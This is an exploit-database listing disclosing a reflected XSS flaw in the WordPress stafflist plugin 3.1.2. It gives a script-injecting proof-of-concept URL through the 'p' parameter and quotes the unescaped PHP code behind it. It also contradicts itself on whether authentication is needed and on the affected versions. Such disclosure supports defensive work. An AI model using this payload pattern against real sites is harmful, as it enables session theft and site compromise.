Share
## https://sploitus.com/exploit?id=PACKETSTORM:166924
# Exploit Title: WordPress Plugin stafflist 3.1.2 - Reflected XSS (Authenticated)  
# Date: 05-02-2022  
# Exploit Author: Hassan Khan Yusufzai - Splint3r7  
# Vendor Homepage: https://wordpress.org/plugins/stafflist/  
# Version: 3.1.2  
# Tested on: Firefox  
# Contact me: h [at] spidersilk.com  
  
# Summary:  
  
A cross site scripting reflected vulnerability has been identified in  
WordPress Plugin stafflist version less then 3.1.2. that allows  
unauthenticated users to run arbitrary javascript code inside  
WordPress using Stafflist Plugin.  
  
# POC  
  
http://localhost:10003/wp-admin/admin.php?page=stafflist&remove=1&p=1%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E  
  
# Vulnerable Parameters  
  
p and s parameters are vulnerable.  
  
# Vulnerable Code:  
  
$html = ($cur > 1 ? "<p class='pager'><a  
href='{$stafflisturl}&p=".($cur-1)."&s={$_GET['s']}'>Previous  
</a></p>" : ""); //<